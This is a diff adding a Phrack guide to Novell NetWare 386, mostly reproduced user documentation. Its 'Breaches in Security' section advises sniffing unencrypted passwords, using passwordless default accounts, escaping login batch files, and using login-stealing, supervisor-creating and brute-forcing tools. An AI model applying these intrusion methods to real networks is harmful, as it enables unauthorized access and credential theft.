+   $      WRITE SYS$OUTPUT "      ' 'FILE' "
+   $      GOTO DIR$LOOP
+   $  END$DIR$LOOP:
+   $      EXIT                                              
+
+<END PART I>
+______________________________________________________________________________
diff --git a/phrack35/8.txt b/phrack35/8.txt
new file mode 100644
index 0000000..df16219
--- /dev/null
+++ b/phrack35/8.txt
@@ -0,0 +1,1924 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-five, File 8 of 13
+
+ 
++=========================================================================+
+                                                                           
+ 
+                   A Beginners Guide to Novell Netware 386                 
+ 
+                                                                           
+ 
+                             Brought to you by:                            
+ 
+                                                                           
+ 
+                                 The Butler                                
+ 
+ 
++=========================================================================+
+
+As most of you know NOVELL is the most popular PC network software around,with
+that being the case I decided to put together a little file on just what you
+can do with a NOVELL network.
+
+* The information in this file is primarily for NOVELL NETWARE 386 networks!!!
+If you have NOVELL NETWARE 286 some of this information may not be correct.
+
+When the word "Network" is mentioned in this file I am referring to a PC-based
+network or LAN (Local Area Network).
+
+If you are not familiar with the concept of a "Network" I would suggest you
+first get acquainted with it by either picking up a good book or if you have
+access to one, go exploring.
+
+This file is for those who have some experience with networks and or the
+concept of a network.
+
+(----------------------------------------------------------------------------)
+
+Variations in Setups:
+
+Every network is setup differently is some way.  Even within the same company
+two different networks may be setup different.  The differences may be slight
+or major and can consist of everything from menus to naming conventions.
+
+Companies that install networks as a business are inconsistent with their
+setups also because every network technician does things differently and every
+customer wants things to be a certain way.
+
+Keep this idea in mind when exploring different networks because most likely
+the setup will be different from network to network.
+
+(----------------------------------------------------------------------------)
+
+Terminology:
+
+ Bindery-- A database that contains definitions of entities such as users
+           groups, and workgroups.  The bindery is comprised of three
+           components: objects, properties, and property data sets.
+
+ Console-- The monitor and keyboard at which you actually control fileserver
+           activity.
+
+ File Server-- The Computer that the Network software, applications, and some
+               data reside on.  (Usually a very powerful one, i.e. Compaq 486
+               with 1 gigabyte of storage).
+
+ Groups-- A means of dealing with users collectively rather than individually.
+          i.e. Word Processing, Accounting.
+
+ LAN-- Local Area Network
+
+ Login Script-- Similar to autoexec.bat, contains commands that initialize
+                environmental variables, map network drives, and control the
+                user's program execution.
+
+ Netware-- Novell's Network Operating System.
+
+ Netwire-- Novell's on-line information service, accessible via Compuserve.
+
+ Network-- A group of computers that can communicate with each other.
+
+ NIC-- Network Interface Card
+
+ Novell-- Software Manufacturer
+
+ Objects-- any physical or logical entities, including users, user groups,
+           workgroups, file servers, print servers, or any other entity that
+           has been given a name.
+
+ Print Server-- A computer dedicated to controlling all jobs for a specified
+                printer.
+
+ Properties-- the characteristics of each bindery object.  Passwords, account
+              restrictions, account balances, internetwork addresses, list of
+              authorized clients, and group members are all properties.
+
+ Property Data Sets-- the values assigned to an entity's bindery properties.
+
+ Rights-- Rights control which directories and files a user or group can
+          access and what the user or group is allowed to do with those
+          directories and files.
+
+ User-- Any person allowed to work on the network.
+
+ WAN-- Wide Area Network
+
+ Workstation-- Any usable computer connected to a network.
+
+(----------------------------------------------------------------------------)
+
+Netware Environment:
+
+The SYS:SYSTEM directory is used for system administration and contains
+operating system files, NetWare utilities, and programs reserved for
+SUPERVISOR.
+
+The SYS:PUBLIC directory is used for general access and contains NetWare
+utilities and programs for regular network users.
+
+The SYS:LOGIN directory contains the programs necessary for logging in.
+
+The SYS:MAIL directory is used by NetWare-compatible mail programs.  This
+directory also has and ID number subdirectory for each user that contains
+the user login script and print job configurations.
+
+(----------------------------------------------------------------------------)
+
+Breaches in Security:
+
+Set Allow Unencrypted Passwords=on/off.
+
+Enter this command from the "CONSOLE".
+
+By changing this command you will disable the encryption scheme which will
+then allow you to sniff passwords from the cables between workstations and
+servers.
+
+By default Netware comes with usernames GUEST and SUPERVISOR that have no
+passwords.
+
+Also try names like TAPE, BACKUP, SERVER, REMOTE, CONNECT, NOVELL, etc...  If
+you have access to an existing account use SYSCON to get a list of all the user
+names, most likely there will be one or two accounts that don't have passwords.
+
+Also on some of these accounts that do not have passwords, part of their logon
+process is the execution of a batch file that executes the individual software
+i.e. backup.  A batch file is a batch file so if its not disabled do the old
+CTRL-C to break out of the batch file and roam around.  Some accounts like the
+backup account must have supervisor rights so that everything can be backed up.
+So if you can break out of one of these you can roam the whole Network.
+
+There are also a few neat little programs out there in cyberspace that will
+make your task of getting access a little easier:
+
+        1.  THIEFNOV.ZIP ===> THIEFNOV is a TSR that will capture usernames
+                              and passwords from a workstation on Novell
+                              Networks. The Thief works by hiding in a user's
+                              autoexec.bat file, and executing every time
+                              someone tries to login to the network.  The Thief
+                              captures their username and password and saves
+                              them in a hidden file in the root directory of
+                              their C: drive.
+
+        2.  TEMPSUP.ZIP ====> TEMPSUP is a utility that will create a user for
+                              you to play with.  TEMPSUP comes with two
+                              programs, an executable and a NLM module. The
+                              executable can be run by any user with access to
+                              DOS but only gives you the rights of that user.
+                              But, the NLM module can be loaded at the Console
+                              and will give you Supervisor Rights to the whole
+                              Network. The syntax is "Tempsup_username to be
+                              created" i.e. f:> tempsup hacker <return>.
+
+        3.  NETCRACK.ZIP ===> NETCRACK is a brute force hacking program
+                              designed for Novell.  NETCRACK can be run with
+                              out login in to the network but by just loading
+                              ipx and netx.  NETCRACK starts with AAA and goes
+                              from there trying to guess the password for any
+                              user.  The syntax is "netcrack_username <return>.
+
+
+These are the only programs I know of made especially for Novell and I have
+personally tried them all out with excellent results.
+
+If you do get access to a Novell Network and you are not sure what to do, then
+go to the F:\PUBLIC directory and type HELP.  Novell comes with an online help
+system that uses FOLIO Infobases.  The HELP system is very easy to navigate
+through and is better that the actual Novell Manuals.  You can even download
+the programs NFOLIO.COM & NFOLIO.EXE and the infobases *.NFO to your local PC
+to examine further.
+
+If you are using the brute force hacking method Novell will stop you dead in
+your tracks if the Intruder Detection/Lockout option has been enabled because
+after 3 unsuccessful login attempts the account is locked until a supervisor
+resets it.
+
+Intruder Detection/Lockout options are as follows:
+
+        Detect Intruders:                       Yes/No
+        Intruder Detection Threshold
+        Incorrect Login Attempts:               #
+        Bad Login Count Retention Time:         # Days    # Hours   # Minutes
+
+        Lock Account After Detection:           Yes/No
+                Length of Account Lockout:      # Days    # Hours   # Minutes
+
+
+The following restrictions are optional for every user account:
+
+        Account Disabled:                       Yes/No
+        Account Has Expiration Date:            Yes/No
+                Date Account Expires:
+        Limit Concurrent Connections:           Yes/No
+                Maximum Connections:
+        Allow User To Change Password           Yes/No
+        Require Password:                       Yes/No
+                Minimum Password Length:
+        Force Periodic Password Changes:        Yes/No
+                Days Between Forced Changes:
+                Date Password Expires:
+                Limit Grace Logins:             Yes/No
+                        Grace Logins Allowed:
+                        Remaining Grace Logins:
+        Require Unique Passwords:               Yes/No
+
+
+Novell can also be setup so that users can only logon during certain hours,
+i.e. 8 a.m. - 5 p.m. Monday thru Friday.
+
+Trustee Assignments grant rights to specific users (or groups) that allow
+them to use a file or directory in particular ways (i.e., only for reading)
+The network supervisor can select the appropriate rights to assign to users
+or groups in each directory or file.
+
+A trustee assignment automatically grants users the right to see to the root of
+a directory.  However, the users can't see any of the subdirectories unless
+they also have been granted rights in the subdirectories.
+
+Inherited Rights Masks are given to each file and directory when they are
+created.  The default Inherited Rights Mask includes all rights. But this does
+not mean that users have all rights; users can only use rights that they been
+granted in trustee assignments.
+
+If the Inherited Rights Mask is modified for a file or subdirectory below the
+original trustee assignment, the only rights the user can "inherit" for the
+file or subdirectory are rights that are allowed by the Inherited Rights Mask.
+For example, if a user is granted Read right with a directory trustee
+assignment, the right to read files in a subdirectory could be revoked by
+having the Read right removed from the subdirectory's Inherited Rights Mask.
+
+Both trustee assignments and Inherited Rights Masks use the same eight trustee
+rights to control access to directories and file.
+
+S -- Supervisory
+
+        Supervisory right grants all rights to the directory or file.  At the
+        directory level, this right grants all rights to the directory and to
+        any files, subdirectories, or subdirectory files in that directory.
+        The Supervisory right overrides any restrictions placed on subdirs or
+        files with Inherited Rights Masks.  Users who have the Supervisory
+        right in a directory can grant other users Supervisory rights to the
+        directory, its files, and subdirectories.
+
+        Once the Supervisory right has been granted, it can be revoked only
+        from the directory is was granted to.  It cannot be revoked in a
+        file or subdirectory.
+
+R -- Read
+
+        Read right allows users to open and read files.  At the directory
+        level this right allows users to open files in a directory and read
+        the contents or run the program.  At the file level, this right allows
+        users to open and read the file (even when the right has been revoked
+        at the directory level).
+
+W -- Write
+
+        Write right allows users to write to files.  At the directory level,
+        this right allows users to open and write to (modify the contents of)
+        file in the directory.  At the file level, this right allows users
+        to open and write to the file (even if the right has been revoked at
+        the directory level).
+
+C -- Create
+
+        Create right allows users to create directories and files.  At the
+        directory level, this right allows users to create files and
+        subdirectories in the directory.  At the file level, this right
+        allows users to salvage a file after it has been deleted.
+
+E -- Erase
+
+        Erase right allows users to delete directories and files.  At the
+        directory level, this right allows users to delete a directory as well
+        as any files, subdirectories, and subdirectory files in that
+        directory.  At the file level, this right allows users to delete the
+        file (even when the right has been revoked at the directory level).
+
+M -- Modify
+
+        Modify right allows users to change directory and file attribute sand
+        to rename subdirectories and files. At the directory level, this right
+        allows users to change the attributes of and rename any file, subdir,
+        or subdirectory file in that directory. At the file level, this right
+        allows users to change the file's attributes or to rename the file
+        (even when the right has been revoked at the directory level).
+
+F -- File Scan
+
+        File Scan right allows users to see files.  At the directory level,
+        this right allows users to see files and subdirectories in a
+        directory.  At the file level, this right allows users to see the file
+        (even when the right has been revoked at the directory level).
+
+A -- Access Control
+
+        Access Control right allows users to modify trustee assignments and
+        Inherited Rights Masks.
+
+(----------------------------------------------------------------------------)
+
+As a network user, you should be familiar with the operation of the personal
+computer you are using.  If you have an IBM PC-type workstation, you should
+also be familiar with basic Disk Operating System (DOS) commands.
+
+User Basics is divided into the following ten sections.  The first section
+explains basic networking concepts and gives an overview of how a NetWare
+network operates.
+
+The second section introduces the NetWare menu and command line utilities and
+explains how to use them.
+
+The next seven sections explain some basic network tasks:
+
+o   Booting up
+o   Logging in and out
+o   Creating your login script
+o   Mapping your drives
+o   Sending messages
+o   Managing files and directories
+o   Printing
+
+Some basic troubleshooting hints are covered under "What If ..." at the end of
+each of these modules and are also listed in the index.
+
+The last section lists some common error messages and how to respond to them.
+
+This booklet does not explain how to perform every network task or how to use
+every available network command.  For complete explanations of all network
+tasks and commands, see NetWare v3.11 Utilities Reference.
+
+INTRODUCTION TO NETWARE
+
+If your personal computer is part of a NetWare network, it is connected to
+other computers and peripherals.  You can share files and resources and
+communicate with others in your workgroup, thus increasing productivity.
+
+This introduction answers the following questions about using a NetWare
+network:
+
+o   What is a NetWare network?
+o   How does a network operate?
+o   How are files stored on a network?
+o   Who can use the network?
+o   How is information protected on a network?
+
+WHAT IS A NETWARE NETWORK?
+
+A NetWare network is a group of computers (such as IBM PCs or Macintoshes)
+that are linked together so they can communicate and share resources.
+
+Network users, each working on a different personal computer, can communicate
+with each other via the network.  They can also share network resources (hard
+disks on the file server, data, applications, and printers) and use any service
+the network provides (for example, access to a mainframe system).
+
+HOW DOES A NETWORK OPERATE?
+
+To understand how a network operates, you must know about the principal
+components of a network: the file server, the workstations, and the software
+that runs on each----NetWare and operating systems like DOS, OS/2, VMS, UNIX,
+and the Macintosh operating system.
+
+Beyond these basic components, a NetWare network can incorporate mainframe
+computers, backup devices, modem pools, and different types of servers (such as
+file servers, print servers, or archive servers).
+
+The Network Workstations and DOS
+
+Workstations are the personal computers on which network users do their work.
+Workstations are used much like non-networked personal computers.  The only
+difference is that they can access files from more than just the local drives.
+Each workstation processes its own files and uses its own copy of DOS.
+
+The Network File Server and NetWare
+
+The file server is a personal computer that uses the NetWare operating system
+to control the network.  The file server coordinates all of the workstations
+and regulates the way they share network resources.  It regulates who can
+access which files, who can make changes to data, and who can use the printer
+first.
+
+All network files are stored on a hard disk in or attached to the file server,
+instead of on diskettes or hard disks in individual workstations.
+
+The NetWare Workstation
+
+Workstations use two pieces of software to communicate with the file server,
+the shell and a protocol.  The shell must be loaded into each workstation
+before that workstation can function on the network.
+
+The NetWare shell, either NET3 or NET4 (depending on whether you are using DOS
+3.x or 4.x), directs workstation requests to DOS or NetWare.  When a
+workstation makes a request (asks to do a task), the shell decides if it is a
+workstation task (to be directed to DOS) or a network task (to be directed to
+NetWare).  If the request is a workstation task (such as using the DOS DIR
+command to list the files in a local directory), DOS should handle the request.
+If the request is a network task (such as printing a job on a network printer),
+NetWare should handle the request.  The shell sends the request to the
+appropriate operating system, somewhat like a railroad track switcher sends
+trains to the proper destination.
+
+The workstation shell uses another file, IPX.COM, to send network messages to
+the file server and, in some cases, directly to other network stations.  This
+IPX protocol is the language the workstation uses to communicate with the file
+server.
+
+HOW ARE FILES STORED ON A NETWORK?
+
+All network information is stored on the file server's hard disk.  The system
+for storing that information is called the "directory structure."
+
+The NetWare directory structure, or storage system, is organized into
+
+o   File servers, which contain one or more
+o   Volumes, which can span several hard disks and are divided into
+o   Directories, which can contain other directories (subdirectories) and
+o   Files.
+
+A directory structure can be compared to a filing cabinet system.
+
+o   The file server corresponds to the filing cabinet.
+
+o   The volumes correspond to the filing cabinet drawers.  Each file server
+    has at least one volume, the SYS volume, which is created when the server
+    is installed.  In NetWare v3.11, however, one volume can span several
+    hard disks.
+
+o   The directories correspond to the hanging folders within the filing
+    cabinet drawers.  You can create and delete directories to suit your
+    organizational needs, much as you insert hanging folders into, and remove
+    them from, a filing cabinet.
+
+o   Directories can contain other directories, which are sometimes referred
+    to as "subdirectories.  These directories within a directory then
+    correspond to the manila folders inside the hanging folders.  They divide
+    directories into smaller units, just as manila folders divide hanging
+    folders into smaller units.
+
+o   And finally, directories contain actual files, just as manila folders
+    contain individual documents.  A file might be a letter or a list of
+    addresses.  When you save information in a file, you give the file a
+    unique name so you can retrieve it later.
+
+WHO CAN USE THE NETWORK?
+
+Before being able to work on the network, a person must be designated as a
+network user.  Network users can be assigned four levels of responsibility on
+the network.
+
+o   Regular network users
+
+o   Operators (file server console operators, print queue operators, print
+    server operators)
+
+o   Managers (workgroup managers, user account managers)
+
+o   Network supervisors
+
+Regular network users are the people who work on the network.  They can run
+applications and work with files according to the rights assigned to them.
+
+Operators are regular network users who have been assigned additional   
+privileges.  For example, a file server console operator is a network user
+who is given specific rights to use the FCONSOLE utility.
+
+Managers are users who have been given responsibility for creating and/or
+managing other users.  Workgroup managers can create and manage users; user
+account managers can manage, but not create, users.  Managers function as
+supervisors over a particular group, but they do not have supervisor
+equivalence.
+
+Network supervisors are responsible for the smooth operation of the whole
+network.  Network supervisors maintain the system, restructuring and updating
+it as needed.  Supervisors may also teach regular network users how to use the
+network.
+
+HOW IS INFORMATION PROTECTED ON A NETWORK?
+
+All information on a NetWare network is stored in a central location---the file
+server's hard disk.  However, all users should not be able to access all
+information (such as payroll files).  In addition, users should not always be
+able to access the same data file at the same time; otherwise, they may
+overwrite each other's work.
+
+To prevent problems like these, NetWare provides an extensive security system
+to protect the data on the network.
+
+NetWare security consists of a combination of the following:
+
+o   Login security
+
+    Login security includes creating usernames and passwords and imposing
+    station, time, and account restrictions on users.
+
+o   Trustee rights (privileges) assigned to users
+
+    Trustee rights control which directories and files a user can access and
+    what the user is allowed to do with those directories and files, such as
+    creating, reading, erasing, or writing to them.
+
+o   Attributes assigned to directories and files
+
+    Directory and file attributes determine whether that directory or file
+    can be deleted, copied, viewed, or written to.  Among other things, they
+    also mark a file as shareable or non-shareable.
+
+These three levels of security work together to protect the network from
+unauthorized access.
+
+REVIEW
+
+This introduction explained the following:
+
+o   A NetWare network links personal computers so users can communicate and
+    share resources.
+
+o   A NetWare network consists of two or more workstations and at least one
+    file server.
+
+    Workstations are personal computers on which network users do their work.
+    Workstations run their own native operating system (for example, DOS) and
+    process their own files.  They can access files, applications, and
+    resources through the file server.
+
+    File servers are personal computers that use the NetWare operating system
+    to coordinate all network activities.
+
+o   Workstations and the file server communicate via the NetWare shell, which
+    must be loaded into each workstation (just as DOS must be loaded into
+    each workstation).  NET3 or NET4 (the NetWare shells corresponding to DOS
+    3.x or 4.x) sends workstation requests to the proper operating system
+    (file server or workstation) for processing.
+
+o   The shell uses a protocol, such as IPX, to send messages to the
+    appropriate network station.
+
+o   Information is stored on the file server in a directory structure that is
+    made up of volumes, directories, and files.
+
+o   There are four types of network users:  regular network users, network
+    operators, network managers, and network supervisors.  The type of user
+    you are is determined by your responsibilities.
+
+o   NetWare's extensive security system prevents users from corrupting data
+    in network files and prevents unauthorized users from accessing
+    restricted files.
+
+WHAT ARE MENU AND COMMAND LINE UTILITIES?
+
+You use NetWare utilities to perform network tasks.  There are two types of
+utilities: menu utilities and command line utilities.  Menu utilities let you
+perform network tasks by choosing options from menus.  Command line utilities
+let you perform tasks by typing commands at the DOS command line.  This section
+explains how to execute both types of NetWare utilities.
+
+WORK WITH MENU UTILITIES
+
+Access a Menu Utility
+
+To access a menu utility, such as FILER, type the utility's name
+at the DOS prompt and press <Enter>.  The utility's main menu
+is displayed along with a screen header showing the following:
+
+o   The utility's full name
+o   The current date and time
+o   The directory path leading up to your current directory (some utilities)
+o   Your username on your file server (some utilities)
+o   Your connection number (some utilities)
+
+Exit a Menu Utility
+
+There are two ways to exit a menu utility:
+
+o   Press <Escape> until an exit confirmation box appears.  Then highlight
+    "Yes" and press <Enter>.
+
+o   Press the Exit key (usually <Alt><F10>).  Do not press the Exit key to exit
+    a menu utility if you have made changes within the utility; if you do, the
+    changes are not saved.  Exiting via the Escape key saves your changes.
+
+Additional Information
+
+Once you have accessed a menu utility and the main menu is displayed, you are
+ready to work.  Menu utilities use certain keys to perform special functions.
+The utilities also have certain standard components.  The keys, wildcards, and
+components are described below.
+
+F1  (Help) Key.  Displays help screens.
+    If you press the help screen once, a help screen that applies to the task
+    you are currently working on appears.  The help screen describes all the
+    options on the screen.  To get help on a specific option, highlight the
+    option and press <Enter>.
+
+    If you press the Help key twice, your computer's function key assignments
+    are listed.  There are three screens containing function key assignments.
+    Press the <PageDown> key to see subsequent screens.
+
+F5  (Mark) Key.  Allows you to mark multiple items in a list so you can add or
+    delete several items at once.
+
+Esc (Escape) Key.  Has three functions:
+
+    1)   If you are on a menu screen, pressing <Escape> allows you to return to
+         a previous menu.
+
+    2)   If you are at the main menu, pressing <Escape> causes an exit
+         confirmation box to appear.  By highlighting "Yes" and pressing
+         <Enter>, you exit the menu utility and return to the menu or command
+         line prompt.
+
+    3)   If you are performing a process, pressing <Escape> allows you to
+         continue.
+
+Wildcard characters (* and ?).  DOS and NetWare recognize these as universal
+replacements for any other character or set of characters.  Wildcards can be
+used to search for groups of volumes, directories, or files, or they can be
+used to search for a particular file when you are unsure of its complete
+name.
+
+An asterisk (*) in a filename indicates that any character can occupy that
+position and all remaining positions in the filename.  For example, in the
+FILER utility, to copy all subdirectory's files with the extension .EXE to
+another directory, type "*.EXE" in the menu's entry box and press <Enter>.
+
+In contrast, a question mark (?) in a filename indicates that any character can
+occupy that position, and that position only.  So, if you were to type
+"ACCOUNT?.NEW", you would copy files like ACCOUNT1.NEW, ACCOUNT2.NEW, and so
+on.
+
+NetWare's use of wildcard characters differs from DOS's in one respect.  For
+example, to represent all files in a directory, DOS expects you to type "*.*",
+whereas NetWare only needs one asterisk (*).
+
+For more information about wildcard characters (global filename characters),
+see your DOS manual.
+
+Components.  When you first access a menu utility, the main menu is displayed.
+Menus contain options you can choose from.  Options can be selected one of two
+ways:
+
+o   You can use the arrow keys to highlight the option you want. Then press
+    <Enter>.
+
+o   You can type the first letter of an option to highlight that option.  If
+    more than one option in the menu starts with the same letter(s), type
+    enough additional letters to distinguish one option from the others.  (For
+    example, if both "Search" and "Select" were options, you would have to type
+    "Sel" to highlight "Select.")  Once the option you want is highlighted,
+    press <Enter>.
+
+When you select an option from the main menu, additional menus and displays
+appear on the screen.  These displays include lists, entry boxes, insets,
+forms, and confirmation boxes.  Each type of screen display is explained
+below.
+
+Lists               Lists are similar to menus, and items in the lists can be
+                    selected the same way menu options are.  However, you can
+                    also add to and delete items from some lists.  Lists may
+                    have more than one column, and they may extend below the
+                    screen display.  Press the Down-arrow key to see additional
+                    items.  Pressing <Ctrl><PageDown> takes you to the bottom
+                    of the list.  Pressing <Ctrl><PageUp> takes you to the top
+                    of the list.
+
+Entry boxes         Entry boxes are boxes in which you can get information,
+                    such as a username or pathname.  The Delete, Backspace, and
+                    arrow keys work in these boxes.
+
+Insets              Insets display information that cannot be edited (except by
+                    the network supervisor).  Regular users cannot add to or
+                    delete from the information in this window.
+
+Forms               Forms are windows that contain fields.  You can move around
+                    in a form using the arrow keys or the Enter key.  (When you
+                    press <Enter>, the cursor moves to the next field in the
+                    form.)  You can change the information in the field by
+                    highlighting the field and pressing <Enter>.
+
+                    What you do next depends on the type of field.  Some fields
+                    allow you to type in information; others display menu items
+                    to select.
+
+Confirmation boxes  Confirmation boxes are displayed whenever you exit a menu
+                    utility or whenever you create or delete items (such as
+                    directories or files).  You can either confirm or cancel
+                    the action by selecting "Yes" or "No" and pressing <Enter>.
+
+WORK WITH COMMAND LINE UTILITIES
+
+Command Format
+
+The command format displays the appropriate syntax for command line utilities.
+Command line utilities are typed in at the DOS prompt.
+
+The following are examples of the command formats for the NPRINT and the TLIST
+utilities:
+
+    NPRINT path [option...]  <Enter>
+
+    TLIST [path [USERS | GROUPS]]  <Enter>
+
+Conventions
+
+The conventions for these example command formats are explained below:
+
+NPRINT      Words that appear in all capital letters must be spelled exactly as
+            shown.  Although they appear in capital letters, they can be typed
+            in either upper or lower case.
+
+path        Words that appear in lower case are variables.  They should be
+            replaced with the information pertinent to your task.  In this
+            case, "path" would be replaced with the path leading to and
+            including the file you want to indicate, and you would replace
+            "option" with any NPRINT options you want to specify.
+
+[ ]         Square brackets indicate that the enclosed item is optional:  you
+            can enter a command with or without the enclosed item.  In this
+            case, "option" is optional.
+
+....        Ellipses indicate that more than one option can be used with the
+            command.  In this case, more than one NPRINT option can be entered
+            in the command.
+
+<Enter>     The angle brackets indicate that you should press the key whose
+            name appears between them.
+
+            Always press <Enter> after typing the command format for
+command
+            line utilities.
+
+[[ ]]       Nested square brackets indicate that all enclosed items are
+            optional.  However, if you use the item(s) within the innermost
+            brackets, you must also use the item(s) within the outer brackets.
+
+|           A vertical bar or "pipe" means "either, or."  You can use either
+            the item to the left of the vertical bar or the item to the right,
+            but not both.
+
+Wildcard Characters
+
+DOS and NetWare recognize wildcard characters (* and ?) as universal
+replacements for any other character or set of characters.  Wildcards can be
+used to search for groups of volumes, directories, or files, or to search for a
+particular file when you are unsure of its complete name.
+
+An asterisk (*) in a filename indicates that any character can occupy that
+position and all remaining positions in the filename.  For example, to search
+for all filenames with the extension .EXE in your default directory, type "NDIR
+*.EXE" and press <Enter> to display the list.
+
+In contrast, a question mark (?) in a filename indicates that any character can
+occupy that position, and that position only.  So, if you were to type "NDIR
+*.?", you would see a list of all files in your default directory with a
+single-character extension or no extension at all.
+
+NetWare's use of wildcard characters differs from DOS's in one respect.  For
+example, to represent all files in a directory, DOS expects you to type "*.*",
+whereas NetWare only needs one asterisk (*).
+
+For more information about wildcard characters (global filename characters),
+see your DOS manual.
+
+GET HELP IN NETWARE
+
+Use the NetWare HELP utility to view on-line information about NetWare
+utilities, NetWare system messages, and NetWare concepts.  NetWare HELP allows
+you to search for and retrieve information from infobases (information
+databases).  To access HELP, type
+
+    HELP  <Enter>
+
+Press <Enter> again to bring up the main menu.  For more information on how to
+use NetWare HELP, press the Tab key until you get to "How to use this
+reference."  Then press <Enter>.
+
+BOOT UP
+
+To "boot up" your workstation means to turn on your computer, load DOS, and
+then load the workstation shell.  You accomplish all of this with a boot
+diskette, or you can put the necessary boot files on your workstation's hard
+disk.  These boot files start up the workstation operating system, load the
+NetWare shell, and gain access to the network.
+
+Create Boot Diskettes
+
+1.  Format a blank diskette as a boot diskette, using the DOS FORMAT command. 
+    Insert a diskette into drive A and type
+
+        Format a: /s  <Enter>
+
+    Follow the screen prompts.
+
+2.  Copy IPX.COM and the shell file (NETx.COM) onto the boot diskette or to the
+    root directory of your workstation's hard disk.
+
+    If your workstation uses DOS 3.x, use NET3.COM.
+
+    If your workstation uses DOS 4.x, use NET4.COM.
+
+3.  Copy these following additional boot files to the boot diskette or your
+    hard disk, if needed.  Your network supervisor can provide you with these
+    files:
+
+    AUTOEXEC.BAT
+    CONFIG.SYS
+    SHELL.CFG
+
+    See also "Boot files" in NetWare v3.11 Concepts and Appendix A in NetWare
+    v3.11 Installation.
+
+4.  Label the boot diskette.
+
+Create an AUTOEXEC.BAT File
+
+You can create an AUTOEXEC.BAT file that automatically loads the shell file
+each time you boot the workstation.  This AUTOEXEC.BAT file can also set your
+workstation to the first network drive (F), connect you (user MARIA) to a file
+server (WONDER), and set your DOS prompt to show your current directory (PROMPT
+$P$G).
+
+Follow these steps to create your AUTOEXEC.BAT file:
+
+1.  Insert your boot diskette into drive A and change to drive A.  If you plan
+    to boot from your hard disk, change to your hard disk drive (C or D).
+
+2.  If you are using DOS 4.x, type
+
+        COPY CON AUTOEXEC.BAT  <Enter>
+        IPX  <Enter>
+        NET4  <Enter>
+        F:  <Enter>
+        LOGIN WONDER/MARIA  <Enter>
+        PROMPT $P$G  <Enter>
+        <Ctrl>Z  <Enter>
+
+    If you are using DOS 3.x, replace NET4 with NET3.
+
+LOGIN/LOGOUT
+
+When you log in to a network, you establish a connection between your
+workstation and the file server.  When you log out, you terminate that
+connection.
+
+To log in to the network, you must type in a unique password.  If there were no
+password, other unauthorized users could easily get to your files and use them
+for their purposes.
+
+Log In to Your Network
+
+To log in to your default server, type
+
+    LOGIN servername/username  <Enter>
+
+Replace servername with the name of the file server you want to log in to.
+Replace username with your login name and (if applicable) type your password
+when you are prompted for it.
+
+Log Out of Your Network
+
+To log out of your default server, type
+
+    LOGOUT  <Enter>
+
+To log out of a file server you are attached to, type
+
+    LOGOUT servername  <Enter>
+
+Attach to Another File Server
+
+Attach to another file server if you want to do the following:
+
+o   Send messages to users on that file server
+
+o   Map a drive to that file server
+
+o   Copy a directory to that file server
+
+To access another file server while remaining logged in to your default file
+server, type
+
+    ATTACH servername/username  <Enter>
+
+Replace servername with the name of the server you want to attach to.  Replace
+username with the username you have been assigned to use on that file server.
+
+Create or Change a Password
+
+1.  To create or change a password on your default server, type
+
+        SETPASS  <Enter>
+
+    The following prompt appears on the screen:
+
+    Enter your old password:
+
+2.  If you are changing a password, enter the old password.  If you are
+    creating a new password, press <Enter>.  The following prompt appears on
+    your screen:
+
+    Enter your new password:
+
+3.  Enter the password you want.  The following prompt appears:
+
+    Retype your new password:
+
+4.  Enter the new password again.  The following message appears on your
+    screen:
+
+    Your password has been changed.
+
+View Who You Are on Your Network
+
+Type
+
+    WHOAMI  <Enter>
+
+Information similar to the following is displayed:
+
+    You are user FRANK attached to server MKTG, connection 1
+    Server MKTG is running NetWare v3.11.
+    Login time:  Wednesday October 2, 1991  8:05 am
+
+    You are user GUEST attached to server ACCT, connection 7
+    Server ACCT is running NetWare v3.11.
+    Login time: Wednesday, October 2, 1991  8:05 am
+
+
+This screen display indicates that you are attached to both file servers MKTG
+and ACCT.  Your username on MKTG is FRANK, and your username on ACCT is GUEST.
+
+View File Servers on Your Network
+
+Type
+
+    SLIST  <Enter>
+
+Information similar to the following appears:
+
+    Known NetWare File Servers   Network   Node Address
+    --------------------------   -------   ------------
+    RECORDS                     [CED88]   [2608C234732]
+    SALES                       [CED87]   [2608C217651]
+    MFG                         [CED86]   [2608C293185]
+
+View Current Users on Your File Server
+
+You must be attached to a file server before you can view the list of users for
+that file server.
+
+Type
+
+    USERLIST  <Enter>
+
+Information similar to the following appears:
+
+    User Information for Server BLOOM
+    Connection  User Name     Login Time
+    ----------  ---------     ------------------
+    1           JOE           4-17-1991  8:05 am
+    2           *CORRINE      4-17-1991 11:20 am
+    3           PAULO         4-17-1991  7:58 am
+    4           GUS           4-17-1991  6:01 pm
+
+An asterisk (*) appears next to your username.
+
+What If ...
+
+.... I can't log in?
+
+o   Your password may have expired or you may have run out of grace logins.
+
+    Your supervisor or manager has to unlock your account.
+
+o   You haven't changed to the network login drive (F).
+
+o   The LOGIN.EXE file is missing.
+
+o   Your shell may be outdated.  Type
+
+        NVER  <Enter>
+
+    Report the version number to your supervisor.
+
+o   Your network board may not be seated correctly.
+
+o   Your file server may be down.  Type
+
+        SLIST  <Enter>
+
+    If your file server is listed, log in by typing
+
+        LOGIN servername/username  <Enter>
+
+o   You may be restricted from logging in during certain times.  Ask the
+    network supervisor.
+
+.... My screen is frozen?
+
+o   Your supervisor should run the MONITOR utility and clear your connection.
+    This saves the work you were doing.  Then complete one of the two following
+    tasks:
+
+    o   To warm boot, press <CTRL><ALT><DEL> simultaneously.
+
+    o   To cold boot, turn the computer OFF, wait 15 seconds, and then turn it
+        ON again.
+
+o   Your network cable may not be connected or terminated properly.  Notify
+    your supervisor.
+
+o   Your node (or station) address may be in conflict with another workstation.
+    See if new workstations have been added to your network.
+
+o   You may have the wrong IPX configuration.  Ask your supervisor.
+
+o   You may have received a message while in graphics mode.  Disable messages
+    before entering graphics mode by typing
+
+        CASTOFF  <Enter>
+
+CREATE YOUR LOGIN SCRIPT
+
+Your login script is a program that automatically sets up your workstation's
+environment each time you log in.  It performs tasks such as mapping network
+drives for you, automatically executing programs and starting applications, and
+attaching you to different file servers.
+
+This section introduces some basic login script commands.
+
+To access your login script, follow these steps:
+
+1.  Type
+
+        SYSCON  <Enter>
+
+2.  Select "User Information" from the main menu.
+
+3.  Select your user name from the list of users that appears.
+
+4.  Select "Login Script."
+
+5.  Enter the commands you need in your login script.  Some common commands are
+    listed under "Common Login Script Commands" below.
+
+6.  Exit and save the login script by pressing <Escape> and answering "Yes" in
+    the confirmation box.
+
+7.  To execute your new login script, you must first log out of the network,
+    and then log in again.
+
+Common Login Script Commands
+
